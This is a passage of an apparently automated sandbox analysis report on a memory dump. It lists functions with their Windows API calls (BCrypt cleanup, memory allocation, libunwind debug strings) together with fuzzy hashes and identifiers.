free.MSVCRT ref: 0000000140035179

Strings

ObjectLength, xrefs: 00000001400351AF
SHA1, xrefs: 000000014003510B
SHA256, xrefs: 0000000140035114

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: Crypt$Destroy$AlgorithmProvider$CloseHashfree$Open
String ID: ObjectLength$SHA1$SHA256
API String ID: 3657822321-2813173312
Opcode ID: e4f3a0a9d189e76fdef056d3e0594785330acbe22461ddd19ffd425ae18585bf
Instruction ID: 9bb5c048302c3d2148e385f6e7b4419e633a23b1ac28fdb801eebc9ef4e7f124
Opcode Fuzzy Hash: e4f3a0a9d189e76fdef056d3e0594785330acbe22461ddd19ffd425ae18585bf
Instruction Fuzzy Hash: 83413776211B0085FB2AEF22E4617EB67A0AB89BC8F544511BF49476F9DB38C540C780

Function 0000000140034050 Relevance: 7.5, APIs: 5, Instructions: 26COMMON

Download Yara Rule

APIs

BCryptDestroyKey.BCRYPT ref: 0000000140034061
BCryptCloseAlgorithmProvider.BCRYPT ref: 0000000140034078
free.MSVCRT ref: 0000000140034088
free.MSVCRT ref: 0000000140034099
free.MSVCRT ref: 00000001400340AA

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: free$Crypt$AlgorithmCloseDestroyProvider
String ID:
API String ID: 3954405007-0
Opcode ID: 0e26d23cee035ca6d3555a028b532afb7ca69d53822d1e87b8507de51176b72b
Instruction ID: 78335706487d59884d208166c705111ac799ae77d35655ac8c0deb762c960831
Opcode Fuzzy Hash: 0e26d23cee035ca6d3555a028b532afb7ca69d53822d1e87b8507de51176b72b
Instruction Fuzzy Hash: 32F0F472611A0481FF16EF73E4617AA2360EB88F8CF044510EF594B2BACF78C855C340

Function 0000000140035010 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

BCryptDestroyHash.BCRYPT ref: 0000000140035021
BCryptDestroyKey.BCRYPT ref: 0000000140035037
BCryptCloseAlgorithmProvider.BCRYPT ref: 000000014003504E
free.MSVCRT ref: 000000014003505E

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: Crypt$Destroy$AlgorithmCloseHashProviderfree
String ID:
API String ID: 4137210468-0
Opcode ID: b8c1d5dca61cefbbb5be88c3f63f3f8e426991d9fe6e7f798bcf695d50ea6645
Instruction ID: ef95f9c2ffd559959a0b48212c11cf6cde57321941e3bdbbf892aa1f10a95968
Opcode Fuzzy Hash: b8c1d5dca61cefbbb5be88c3f63f3f8e426991d9fe6e7f798bcf695d50ea6645
Instruction Fuzzy Hash: 79F09836602A0080FF1AEB72E4657AA6350AB98B89F144410AB494B2AADF79C855C3D0

Function 0000000140033FF0 Relevance: 4.5, APIs: 3, Instructions: 28COMMON

Download Yara Rule

APIs

BCryptCloseAlgorithmProvider.BCRYPT(?,?,?,?,00000001400018BF), ref: 0000000140034026
free.MSVCRT ref: 000000014003402F
free.MSVCRT ref: 0000000140034037

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: free$AlgorithmCloseCryptProvider
String ID:
API String ID: 2805733106-0
Opcode ID: 3844b87f43dfe449c4c2b9430afbca2b6231328a1cad9f3800727cf4a9dbae33
Instruction ID: d5da50ef1939855859af4e1ce8b9d510b7b0f4fb9c97512b0670732a52aea697
Opcode Fuzzy Hash: 3844b87f43dfe449c4c2b9430afbca2b6231328a1cad9f3800727cf4a9dbae33
Instruction Fuzzy Hash: 7DF0A23671651045FF5FAB63F4617EB53505F88BD4F484511AF450BBA5CF38D8424340

Function 00000001400340C0 Relevance: 3.1, APIs: 2, Instructions: 76COMMON

Download Yara Rule

APIs

BCryptEncrypt.BCRYPT ref: 0000000140034165
BCryptEncrypt.BCRYPT ref: 00000001400341D4

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: CryptEncrypt
String ID:
API String ID: 1352496322-0
Opcode ID: 1fda2db5d03e8617fc330f042c955fc8b655588cf5e37f9e04b65fed0f4489d8
Instruction ID: 2eec0a712bb2f4ec78f31e68d370252b3ab45dd555f6cdfc6b8d3851cdad6c96
Opcode Fuzzy Hash: 1fda2db5d03e8617fc330f042c955fc8b655588cf5e37f9e04b65fed0f4489d8
Instruction Fuzzy Hash: 91317A76615B548AEB62CF96E44078AB7E4F75CBD8F140115EF8C4BBA8D738D980CB80

Function 000000014005D060 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 311COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 000000014005D119
realloc.MSVCRT ref: 000000014005D1B7
realloc.MSVCRT ref: 000000014005D204
realloc.MSVCRT ref: 000000014005D259
realloc.MSVCRT ref: 000000014005D2B7
memcpy.MSVCRT ref: 000000014005D2D0
realloc.MSVCRT ref: 000000014005D306
realloc.MSVCRT ref: 000000014005D3FC

Strings

c_object, xrefs: 000000014005D09B
objc_obj, xrefs: 000000014005D08E
objc_obj, xrefs: 000000014005D35B
c_object, xrefs: 000000014005D368

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: realloc$memcpy
String ID: c_object$c_object$objc_obj$objc_obj
API String ID: 1833655766-1179801904
Opcode ID: 87f59c359129445806bdbc2d3b20460f39b5b3fd721a7bb1c2d7c6d2a203fa90
Instruction ID: 595e5dde6d1da9cb22b2448978e28d563c2e379f2e8b5b98001f85ea5e13e8ce
Opcode Fuzzy Hash: 87f59c359129445806bdbc2d3b20460f39b5b3fd721a7bb1c2d7c6d2a203fa90
Instruction Fuzzy Hash: A6C139B6601B8482EF26DB5BE4443ADB7A2E759FC4F058512EB8E477A0DF39C582C340

Function 00000001400030B0 Relevance: 21.3, APIs: 14, Instructions: 311stringCOMMON

Download Yara Rule

APIs

free.MSVCRT ref: 000000014000312B
free.MSVCRT ref: 0000000140003133
free.MSVCRT ref: 000000014000313B
strlen.MSVCRT ref: 00000001400031E7
realloc.MSVCRT ref: 000000014000320A
realloc.MSVCRT ref: 0000000140003223
realloc.MSVCRT ref: 000000014000323C
strncpy.MSVCRT ref: 000000014000325D

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: freerealloc$strlenstrncpy
String ID:
API String ID: 4241376611-0
Opcode ID: 1ffa60fcb4ca4b1eac0a0cc87831d147db2e39fb2cc90b4797d863e1bf45b181
Instruction ID: 7578b160c30e36056dee60dc0aa75ec35e41d6119e658c7710dafc2d000966bf
Opcode Fuzzy Hash: 1ffa60fcb4ca4b1eac0a0cc87831d147db2e39fb2cc90b4797d863e1bf45b181
Instruction Fuzzy Hash: 15D17D72209A8185EB63DB27B8547EB67A8EB8DBD4F444125FF894B7E9DF38C4018740

Function 0000000140050067 Relevance: 13.6, APIs: 9, Instructions: 95COMMON

Download Yara Rule

APIs

isxdigit.MSVCRT ref: 0000000140050082
isxdigit.MSVCRT ref: 0000000140050094
isxdigit.MSVCRT ref: 00000001400500A6
isxdigit.MSVCRT ref: 00000001400500B8
isxdigit.MSVCRT ref: 00000001400500CA
isxdigit.MSVCRT ref: 00000001400500DC
isxdigit.MSVCRT ref: 00000001400500EE
isxdigit.MSVCRT ref: 0000000140050100
malloc.MSVCRT ref: 000000014005014D

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: isxdigit$malloc
String ID:
API String ID: 1399014089-0
Opcode ID: f8b06be04f3b183f8c9e4885ec045c3b3cc2076a764c3f4dd164b092cb3af9e8
Instruction ID: 23e6b8cd426bf820a7cfa49bf61975b4dc07e4119f77671e72e2c53ea99775af
Opcode Fuzzy Hash: f8b06be04f3b183f8c9e4885ec045c3b3cc2076a764c3f4dd164b092cb3af9e8
Instruction Fuzzy Hash: 7A418D32700A8041FB5A8F32E9907AD67A4F748BD1F4C4526ABDA4BAB1DF78D591C340

Function 0000000140016120 Relevance: 10.8, APIs: 5, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00000001400163F6
free.MSVCRT ref: 000000014001649F
free.MSVCRT ref: 00000001400164AE
free.MSVCRT ref: 000000014001659F

Part of subcall function 000000014003C780: setlocale.MSVCRT ref: 000000014003CD3B
Part of subcall function 000000014003C780: free.MSVCRT ref: 000000014003CD4A

Strings

%, xrefs: 0000000140016141
+, xrefs: 000000014001616A

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: free$mallocsetlocale
String ID: %$+
API String ID: 3115544720-2626897407
Opcode ID: 0f922b7fed24624c86fdb06e5217c3efd8da93fdf5c1a813ebfb762e59c78895
Instruction ID: 7b4dca2ebba0c460e55b98a59db5299716405a99f074e415dae7d8745f3a8567
Opcode Fuzzy Hash: 0f922b7fed24624c86fdb06e5217c3efd8da93fdf5c1a813ebfb762e59c78895
Instruction Fuzzy Hash: 2AC10772218A9486FA629B27E8403EF6760E789BD4F444111FF895BBB6DF3DC946C700

Function 00000001400560C0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 0000000140056103
realloc.MSVCRT ref: 000000014005616B

Strings

ame , xrefs: 000000014005618A
> typena, xrefs: 000000014005617C
template, xrefs: 0000000140056118

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: realloc
String ID: > typena$ame $template
API String ID: 471065373-2892875084
Opcode ID: 425b22235dbcaa975daf389685f55c028230596f0b2bcf9deef3724b4f1ad2e3
Instruction ID: e99480d50d98873864ecc72625ba8470dd2b3d05e8589fed2e306706ddfe090f
Opcode Fuzzy Hash: 425b22235dbcaa975daf389685f55c028230596f0b2bcf9deef3724b4f1ad2e3
Instruction Fuzzy Hash: EB314DF2A02B4482EE2ADF57E55439AA761F79CBD0F048121DF9D077A5EB38C592C340

Function 0000000140053070 Relevance: 7.7, APIs: 5, Instructions: 217COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00000001400530E4
realloc.MSVCRT ref: 00000001400531AE
realloc.MSVCRT ref: 00000001400531FD

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: bb567be66350f12538ceaf452499a841885437baa456a16ec14add05c560b684
Instruction ID: 1a0d4f4817efb46c0158b7a0d2231fd3b7a0c81349dce9940461ecc6eaa00ab3
Opcode Fuzzy Hash: bb567be66350f12538ceaf452499a841885437baa456a16ec14add05c560b684
Instruction Fuzzy Hash: 757160B2602F4482EB2ADB57F5547AAA7A1E758BC0F448425EF9E077A1EF39D491C300

Function 000000014004DFF0 Relevance: 7.6, APIs: 5, Instructions: 135stringCOMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 000000014004E026
malloc.MSVCRT ref: 000000014004E03B
memcpy.MSVCRT ref: 000000014004E056
malloc.MSVCRT ref: 000000014004E0CE
strlen.MSVCRT ref: 000000014004E103

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: malloc$memcpyreallocstrlen
String ID:
API String ID: 2194225509-0
Opcode ID: a761a0d08f1265782fc20fcb4a21eb77c94a8238d1cd9de880fcdaff579de5b0
Instruction ID: 7ed94a927e4c21bea5ab9e7da9f33063054800e764fb56e353cc2ecb6d9190f1
Opcode Fuzzy Hash: a761a0d08f1265782fc20fcb4a21eb77c94a8238d1cd9de880fcdaff579de5b0
Instruction Fuzzy Hash: 9241C132211B8492EB2ADF26F9407D937A0E70DBD4F594525EF9D0B7A1DB78C5A6C300

Function 0000000140039070 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00000001400390AC
calloc.MSVCRT ref: 00000001400390BC
MultiByteToWideChar.KERNEL32 ref: 00000001400390E2
GetFileAttributesW.KERNEL32 ref: 00000001400390E7
free.MSVCRT ref: 00000001400390F2

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: ByteCharMultiWide$AttributesFilecallocfree
String ID:
API String ID: 1426449938-0
Opcode ID: a2d823bcb5c61c13db88150e6fc2ad9990c2ff7aae719c11a6f16aa57f1fe907
Instruction ID: 4506211d67c51c18801ff3b85f1265beac3f357ae0a0f0bc09987725835fd231
Opcode Fuzzy Hash: a2d823bcb5c61c13db88150e6fc2ad9990c2ff7aae719c11a6f16aa57f1fe907
Instruction Fuzzy Hash: B811C632704A0145F6229B7BAC1579A56855B897F4F4C0330BF2847BE4EA38C4818200

Function 0000000140060040 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00000001400600D0

Strings

+, xrefs: 0000000140060135

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: strlen
String ID: +
API String ID: 39653677-2126386893
Opcode ID: 427b9f7689f8b8841e312c0c3375671aeb49df9fd54e8812c50c1f39c508a4e4
Instruction ID: 1b3c3f6a5fe6a6fb63eb0ca2544375d579db28458e5cf661b23dcec25cbd23aa
Opcode Fuzzy Hash: 427b9f7689f8b8841e312c0c3375671aeb49df9fd54e8812c50c1f39c508a4e4
Instruction Fuzzy Hash: 1751D8722582808BE73A8B27E8507EFB7A2E34A7D4F148519FB9A47BD1D739D501CB00

Function 000000014005E080 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 000000014005E0B2
fflush.MSVCRT ref: 000000014005E0FD

Strings

LIBUNWIND_PRINT_APIS, xrefs: 000000014005E0AB
libunwind: __unw_get_proc_name(cursor=%p, &buf=%p, bufLen=%lu), xrefs: 000000014005E0DD

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_proc_name(cursor=%p, &buf=%p, bufLen=%lu)
API String ID: 1137233558-3584756005
Opcode ID: 505fe3d6bc56c45a131a61cbd4ba24380b77fdbcb65d4b975444dda1279d8c60
Instruction ID: b303460dfa05383f61e4e7e1926b1bafaee40a898d79328391bba780bc411b80
Opcode Fuzzy Hash: 505fe3d6bc56c45a131a61cbd4ba24380b77fdbcb65d4b975444dda1279d8c60
Instruction Fuzzy Hash: 86110071714A9482FB07DB67AC457DA5B60BB8DBD0F040129BF4A077F2DA3C8986C205

Function 000000014005DFF0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 000000014005E014
fflush.MSVCRT ref: 000000014005E056

Strings

LIBUNWIND_PRINT_APIS, xrefs: 000000014005E00D
libunwind: __unw_resume(cursor=%p), xrefs: 000000014005E03A

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_resume(cursor=%p)
API String ID: 1137233558-227906034
Opcode ID: 82c04c9ae115acf3b8889823c1adb8a46da8627c099d11bf8bebbd7c5e906556
Instruction ID: f049c182cb8416f50408f719f380e8bd9ed47ca5d24b25bfd049c5d570822f5e
Opcode Fuzzy Hash: 82c04c9ae115acf3b8889823c1adb8a46da8627c099d11bf8bebbd7c5e906556
Instruction Fuzzy Hash: 0701A430605AD481FB07AB67B9493E91760A75EBC0F45511AFF4E033F2DE798985C302

Function 0000000140061020 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000000014006104A
GetProcAddress.KERNEL32 ref: 000000014006105A

Strings

msvcrt.dll, xrefs: 0000000140061043
strerror_s, xrefs: 0000000140061050

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: msvcrt.dll$strerror_s
API String ID: 1646373207-1151979360
Opcode ID: 9035045830eb1480bf82cc9b6a4baeedb22537a61e624f421285f8a3cbc76c2b
Instruction ID: 2728d320797bf83ad2fd7965be1f8a0634a464b0c62db1c29af0190c2d897637
Opcode Fuzzy Hash: 9035045830eb1480bf82cc9b6a4baeedb22537a61e624f421285f8a3cbc76c2b
Instruction Fuzzy Hash: 2FF01270716A5580EE178B83AC547E62262AB9CBE4F945522BE4D43374EA7CC889C340

Function 0000000140062120 Relevance: 6.4, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00000001400621C1
LeaveCriticalSection.KERNEL32 ref: 00000001400621FA
free.MSVCRT ref: 000000014006226D
LeaveCriticalSection.KERNEL32 ref: 0000000140062296

Memory Dump Source

Source File: 0000001B.00000002.3547044767.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000001B.00000002.3546993524.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547162743.00000001400B3000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547184360.00000001400B7000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.3547206847.00000001400BE000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_140000000_conhost.jbxd

Similarity

API ID: CriticalLeaveSection$free
String ID:
API String ID: 2017658852-0
Opcode ID: 3c2458963985b9e5e3ba1856dd8da00478556c62d53deed1696fdc3ae5d4e373
Instruction ID: 6647f8eec948407a8904c621679bd3e7aa592c2834e49d11f9995e373ef6544f
Opcode Fuzzy Hash: 3c2458963985b9e5e3ba1856dd8da00478556c62d53deed1696fdc3ae5d4e373
Instruction Fuzzy Hash: 37513431205E4591FF679F87AD953E962E2AB5DBC4F690825EF0D0B3B1EE388681C340

Function 0000000140057080 Relevance: 6.2, APIs: 4, Instructions: 163COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00000001400570C3
realloc.MSVCRT ref: 0000000140057144
realloc.MSVCRT ref: 0000000140057184
realloc.MSVCRT ref: 0000000140057213

